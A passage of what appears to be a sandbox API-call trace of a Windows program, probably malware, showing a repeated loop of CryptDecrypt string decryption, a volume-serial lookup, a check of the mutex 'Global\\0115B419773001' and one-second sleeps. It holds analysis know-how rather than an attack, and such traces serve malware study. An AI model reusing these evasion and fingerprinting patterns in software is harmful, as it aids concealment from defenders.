(hKey=0x13275d8) returned 1 [0134.955] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x4f30050 [0134.955] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x4f30078 [0134.955] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x4f300a0 [0134.955] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13275d8) returned 1 [0134.955] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0134.955] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4f300a0, pdwDataLen=0x2c8f758 | out: pbData=0x4f300a0, pdwDataLen=0x2c8f758) returned 1 [0134.955] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.955] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f300a0 | out: hHeap=0x2cb0000) returned 1 [0134.955] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x4f30050, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.955] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30078 | out: hHeap=0x2cb0000) returned 1 [0134.955] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4550 | out: hHeap=0x2cb0000) returned 1 [0134.955] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.956] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30050 | out: hHeap=0x2cb0000) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb4550 [0134.956] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13275d8) returned 1 [0134.956] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0134.956] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4550, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cb4550, pdwDataLen=0x2c8f7b4) returned 1 [0134.956] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x4f30050 [0134.956] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x540 [0134.956] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x102 [0134.956] CloseHandle (hObject=0x540) returned 1 [0134.956] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4550 | out: hHeap=0x2cb0000) returned 1 [0134.956] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30050 | out: hHeap=0x2cb0000) returned 1 [0134.956] Sleep (dwMilliseconds=0x3e8) [0135.969] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0135.969] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0135.969] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0135.969] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0135.969] CryptDestroyKey (hKey=0x13272d8) returned 1 [0135.969] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0135.969] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0135.969] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0135.969] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327598) returned 1 [0135.969] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0135.969] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0135.969] CryptDestroyKey (hKey=0x1327598) returned 1 [0135.969] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0135.969] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0135.969] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0135.969] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0135.969] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.969] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0135.969] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0135.969] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327598) returned 1 [0135.969] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0135.969] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0135.969] CryptDestroyKey (hKey=0x1327598) returned 1 [0135.970] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0135.970] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0135.970] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0135.970] CloseHandle (hObject=0x4dc) returned 1 [0135.970] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0135.970] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0135.970] Sleep (dwMilliseconds=0x3e8) [0137.001] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0137.001] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327598) returned 1 [0137.001] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0137.002] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0137.002] CryptDestroyKey (hKey=0x1327598) returned 1 [0137.002] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0137.002] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0137.002] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0137.002] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13273d8) returned 1 [0137.002] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0137.002] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0137.002] CryptDestroyKey (hKey=0x13273d8) returned 1 [0137.002] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0137.002] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0137.002] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0137.002] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0137.002] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.002] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0137.002] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0137.002] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327598) returned 1 [0137.002] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0137.002] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0137.002] CryptDestroyKey (hKey=0x1327598) returned 1 [0137.002] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0137.002] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0137.002] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0137.002] CloseHandle (hObject=0x4dc) returned 1 [0137.002] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0137.003] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0137.003] Sleep (dwMilliseconds=0x3e8) [0138.410] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0138.410] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327058) returned 1 [0138.410] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0138.410] CryptDecrypt (in: hKey=0x1327058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0138.410] CryptDestroyKey (hKey=0x1327058) returned 1 [0138.410] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0138.410] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0138.410] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0138.410] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13272d8) returned 1 [0138.410] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0138.410] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0138.410] CryptDestroyKey (hKey=0x13272d8) returned 1 [0138.410] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0138.410] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0138.410] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0138.410] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0138.410] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0138.411] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0138.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0138.411] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327498) returned 1 [0138.411] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0138.411] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0138.411] CryptDestroyKey (hKey=0x1327498) returned 1 [0138.411] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0138.411] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0138.411] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0138.411] CloseHandle (hObject=0x4dc) returned 1 [0138.411] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0138.411] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0138.411] Sleep (dwMilliseconds=0x3e8) [0139.575] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0139.575] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327598) returned 1 [0139.575] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0139.575] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0139.575] CryptDestroyKey (hKey=0x1327598) returned 1 [0139.575] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0139.575] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0139.576] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0139.576] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327498) returned 1 [0139.576] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0139.576] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0139.576] CryptDestroyKey (hKey=0x1327498) returned 1 [0139.576] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0139.576] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.576] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0139.576] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0139.576] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.576] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0139.576] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0139.576] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13273d8) returned 1 [0139.576] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0139.576] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0139.576] CryptDestroyKey (hKey=0x13273d8) returned 1 [0139.576] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0139.576] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0139.577] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0139.577] CloseHandle (hObject=0x4dc) returned 1 [0139.577] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0139.577] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0139.577] Sleep (dwMilliseconds=0x3e8) [0140.924] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0140.924] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0140.924] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0140.924] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0140.924] CryptDestroyKey (hKey=0x13272d8) returned 1 [0140.924] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0140.924] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0140.924] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0140.924] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327698) returned 1 [0140.924] CryptSetKeyParam (hKey=0x1327698, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0140.924] CryptDecrypt (in: hKey=0x1327698, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0140.924] CryptDestroyKey (hKey=0x1327698) returned 1 [0140.924] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0140.924] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0140.924] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0140.924] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0140.924] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.925] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0140.925] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0140.925] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13272d8) returned 1 [0140.925] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0140.925] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0140.925] CryptDestroyKey (hKey=0x13272d8) returned 1 [0140.925] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0140.925] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0140.925] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0140.925] CloseHandle (hObject=0x4dc) returned 1 [0140.925] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0140.925] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0140.925] Sleep (dwMilliseconds=0x3e8) [0142.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0142.267] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0142.267] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0142.267] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0142.267] CryptDestroyKey (hKey=0x13272d8) returned 1 [0142.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0142.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0142.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0142.267] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327598) returned 1 [0142.267] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0142.267] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0142.267] CryptDestroyKey (hKey=0x1327598) returned 1 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0142.268] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0142.268] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0142.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0142.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327058) returned 1 [0142.268] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0142.268] CryptDecrypt (in: hKey=0x1327058, 